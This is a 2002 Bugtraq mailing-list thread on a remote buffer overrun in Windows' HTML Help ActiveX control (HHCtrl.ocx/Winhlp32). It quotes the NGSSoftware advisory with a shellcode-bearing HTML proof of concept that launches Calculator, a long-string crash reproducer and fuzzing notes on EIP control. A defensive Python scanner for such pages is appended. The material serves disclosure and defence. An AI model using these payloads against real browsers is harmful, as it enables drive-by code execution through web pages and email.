Correction, closing out of the app brings up an error where the memory read is
controlled at 4141414d (EIP is elsewhere), so it appears to be a different type
of crash by behavior entirely... but exploitable. Would need to stick a debugger
on it and mess around to narrow it down.

> -----Original Message-----
> From: Drew [mailto:dcopley@eeye.com]
> Sent: Tuesday, August 06, 2002 7:31 PM
> To: 'Mark Litchfield'; 'Jelmer'; 'bugtraq@securityfocus.com'
> Subject: RE: Winhelp32 Remote Buffer Overrun
>
>
> Running this on my local file fuzzer, Litchfield's begins to hit exceptions
> at 200 increments. (At a blank value it gives a memory error).
>
> At 216 increments (and at least for a while, above) it overwrites EIP with
> 41414141. (Windows 2000 Service Pack 2).
>
> Testing Jelmer's as it was written below I ran to 10,000 increments and did
> not find an issue. Testing to 10,000 with .TIF as the extension did not find
> an issue. Testing these same case tests with using the method HHClick() as in
> Litchfield's does not give an issue.
>
> It may have been with another method, or perhaps some interaction with the
> webpage. It may be the characters used to bruteforce it. Perhaps they were
> unicode (which I could test, as well as anything else).
>
>
> > -----Original Message-----
> > From: Mark Litchfield [mailto:mark@ngssoftware.com]
> > Sent: Tuesday, August 06, 2002 12:24 PM
> > To: Jelmer; bugtraq@securityfocus.com
> > Subject: Re: Winhelp32 Remote Buffer Overrun
> >
> >
> > If I am not mistaken, I believe that Microsoft are aware of this issue and
> > have an IE patch coming out very shortly. My brother reported this to them,
> > please see http://www.nextgenss.com/vna/ms-whelp.txt
> >
> > Regards
> >
> > Cheers,
> >
> >
> > Mark Litchfield
> >
> > ----- Original Message -----
> > From: "Jelmer" <jelmer@kuperus.xs4all.nl>
> > To: "Next Generation Insight Security Research Team"
> > <mark@ngssoftware.com>; <bugtraq@securityfocus.com>;
> > <ntbugtraq@listser.ntbugtraq.com>
> > Sent: Thursday, August 01, 2002 5:19 PM
> > Subject: Re: Winhelp32 Remote Buffer Overrun
> >
> >
> > > I just installed service pack 3 and the following code still crashed my
> > > IE6 with a memory could not be referenced error.
> > >
> > > <OBJECT ID=hhctrl TYPE="application/x-oleobject"
> > > CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
> > > <PARAM name="Command" value="Shortcut">
> > > <PARAM name="Button" value="Bitmap:shortcut">
> > > <PARAM name="Item1" value=",,">
> > > <PARAM name="Item2" value="273,1,1">
> > > <PARAM name="codebase" value="">
> > > <PARAM name="Font" value=" A VERY VERY LONG STRING ">
> > > </OBJECT>
> > >
> > > I have been told this means it is most likely exploitable. I am not into
> > > buffer overflows myself though, maybe someone can confirm this. Anyways I
> > > notified microsoft of this several months ago. The day after I notified
> > > them someone pointed me to the ngssoftware advisory *sob*, and I notified
> > > microsoft that this was probably the same issue, last I heard from them
> > > they were looking into if this was indeed the case. It's been several
> > > months and as far as I know they are still looking.
> > >
> > > --
> > > jelmer
> > >
> > > ----- Original Message -----
> > > From: "Next Generation Insight Security Research Team"
> > > <mark@ngssoftware.com>
> > > To: <bugtraq@securityfocus.com>; <ntbugtraq@listser.ntbugtraq.com>
> > > Sent: Friday, August 02, 2002 3:59 AM
> > > Subject: Winhelp32 Remote Buffer Overrun
> > >
> > >
> > > > -----BEGIN PGP SIGNED MESSAGE-----
> > > > Hash: SHA1
> > > >
> > > > NGSSoftware Insight Security Research Advisory
> > > >
> > > > Name: Winhlp32.exe Remote Buffer Overrun
> > > > Systems Affected: Win2K Platform
> > > > Severity: Critical
> > > > Category: Remote Buffer Overrun
> > > > Vendor URL: http://www.mircosoft.com
> > > > Author: Mark Litchfield (mark@ngssoftware.com)
> > > > Date: 1st August 2002
> > > > Advisory number: #NISR01082002
> > > >
> > > >
> > > > Description
> > > > ***********
> > > >
> > > > Many of the features available in HTML Help are implemented through
> > > > the HTML Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX
> > > > control is used to provide navigation features (such as a table of
> > > > contents), to display secondary windows and pop-up definitions, and
> > > > to provide other features. The HTML Help ActiveX control can be used
> > > > from topics in a compiled Help system as well as from HTML pages
> > > > displayed in a Web browser. The functionality provided by the HTML
> > > > Help ActiveX control will run in the HTML Help Viewer or in any
> > > > browser that supports ActiveX technology, such as Internet Explorer
> > > > (version 3.01 or later). Some features, as with the WinHlp Command,
> > > > provided by the HTML Help ActiveX control are meant to be available
> > > > only when it is used from a compiled HTML Help file (.chm) that is
> > > > displayed by using the HTML Help Viewer.
> > > >
> > > > Details
> > > > *******
> > > >
> > > > Winhlp32.exe is vulnerable to a buffer overrun attack using the Item
> > > > parameter within the WinHlp Command. The Item parameter is used to
> > > > specify the file path of the WinHelp (.hlp) file in which the WinHelp
> > > > topic is stored, and the window name of the target window. Using this
> > > > overrun, an attacker can successfully execute arbitrary code on a
> > > > remote system by either encouraging the victim to visit a particular
> > > > web page, whereby code would execute automatically, or by including
> > > > the exploit within the source of an email. In regards to email,
> > > > execution would automatically occur when the mail appears in the
> > > > preview pane and ActiveX objects are allowed (this is allowed by
> > > > default; the Internet Security Settings would have to be set to HIGH
> > > > to prevent execution of this vulnerability). Any exploit would
> > > > execute in the context of the logged on user.
> > > >
> > > > Visual POC Exploit
> > > > ******************
> > > >
> > > > This POC will simply display Calculator. Please note that this was
> > > > written on a Win2k PC with SP2 installed. I have not tested it on
> > > > anything else.
> > > >
> > > > <OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
> > > > codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
> > > > type=application/x-oleobject width=0><PARAM NAME="Width"
> > > > VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
> > > > VALUE="WinHelp"><PARAM NAME="Item1"
> > > > VALUE="3ĄPhcalc4$ƒĄPVøƧéw’Š3ĄP¾”éw’ÖAAAAAA
> > > > AA
> > > > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> > > > AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
> > > > PPPQQQQRRRRSSSSTTTAAAA©õwABCDEFGHƒĘ’ęgMyWindow"><PARAM
> > > > NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
> > > > <SCRIPT>winhelp.HHClick()</SCRIPT>
> > > >
> > > >
> > > > Fix Information
> > > > ***************
> > > >
> > > > NGSSoftware alerted Microsoft to these problems on the 6th March
> > > > 2002. NGSSoftware highly recommend installing Microsoft Windows SP3,
> > > > as the fix has been built into this service pack found at
> > > > http://www.microsoft.com
> > > > An alternative to these patches would be to ensure the security
> > > > settings found in the Internet Options are set to high. Despite the
> > > > Medium setting stating that unsigned ActiveX controls will not be
> > > > downloaded, Kylie will still execute Calc.exe. Another alternative
> > > > would be to remove winhlp32.exe if it is not required within your
> > > > environment.
> > > > A check for these issues has been added to Typhon II, of which more
> > > > information is available from the NGSSoftware website,
> > > > http://www.ngssoftware.com.
> > > >
> > > > Further Information
> > > > *******************
> > > >
> > > > For further information about the scope and effects of buffer
> > > > overflows, please see
> > > >
> > > > http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
> > > > http://www.ngssoftware.com/papers/ntbufferoverflow.html
> > > > http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
> > > > http://www.ngssoftware.com/papers/unicodebo.pdf
> > > >
> > > >
> > > > -----BEGIN PGP SIGNATURE-----
> > > > Version: PGPfreeware 7.0.3 for non-commercial use
> > > > <http://www.pgp.com>
> > > >
> > > > iQA/AwUBPUnnf8a1CFAff8bXEQLz8gCgm4lbs5Fs2WUH5Au2cAkG0JQKKLMAn13p
> > > > a+qSkYWrz7uspZcqqRTc2r0C
> > > > =2PKN
> > > > -----END PGP SIGNATURE-----
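An added defender-side example, not from any of the posters above: a small scanner that flags HTML embedding the HHCtrl.ocx CLSID quoted in both PoCs with an Item or Font parameter long enough to reach the overrun Drew measured (EIP overwritten at 216 bytes). The sample page, the class and function names, and the use of 216 as a cutoff are assumptions made here.

```python
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control (HHCtrl.ocx) used in both PoCs above.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
# Drew reports EIP overwritten at 216 bytes; assumed here as the flagging floor.
LONG_PARAM = 216

class HHCtrlScanner(HTMLParser):
    """Collect every OBJECT that loads HHCtrl, with its PARAM name/value pairs."""
    def __init__(self):
        super().__init__()
        self.objects = []      # each entry: {"id": str, "params": {name: value}}
        self._current = None   # the HHCtrl OBJECT currently open, if any

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            self._current = None
            if HHCTRL_CLSID in a.get("classid", "").lower():
                self._current = {"id": a.get("id", ""), "params": {}}
                self.objects.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current["params"][a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None

def find_suspicious(html):
    """Return (object id, Command value, param name, length) for every HHCtrl
    OBJECT whose Item*/Font parameter is at least LONG_PARAM characters long."""
    scanner = HHCtrlScanner()
    scanner.feed(html)
    findings = []
    for obj in scanner.objects:
        cmd = obj["params"].get("command", "")
        for name, value in obj["params"].items():
            if (name.startswith("item") or name == "font") and len(value) >= LONG_PARAM:
                findings.append((obj["id"], cmd, name, len(value)))
    return findings

# Constructed sample: Jelmer's Shortcut object with a 300-byte Font value next to
# a benign table-of-contents use of the same control.
SAMPLE_HTML = (
    '<OBJECT ID="hhctrl" CLASSID="clsid:' + HHCTRL_CLSID + '">'
    '<PARAM name="Command" value="Shortcut"><PARAM name="Item1" value=",,">'
    '<PARAM name="Font" value="' + "A" * 300 + '"></OBJECT>'
    '<OBJECT ID="toc" CLASSID="clsid:' + HHCTRL_CLSID + '">'
    '<PARAM name="Command" value="Contents"><PARAM name="Item1" value="toc.hhc">'
    '</OBJECT>'
)
```

Running `find_suspicious(SAMPLE_HTML)` reports only the Shortcut object with its 300-character Font value; the table-of-contents object is left alone.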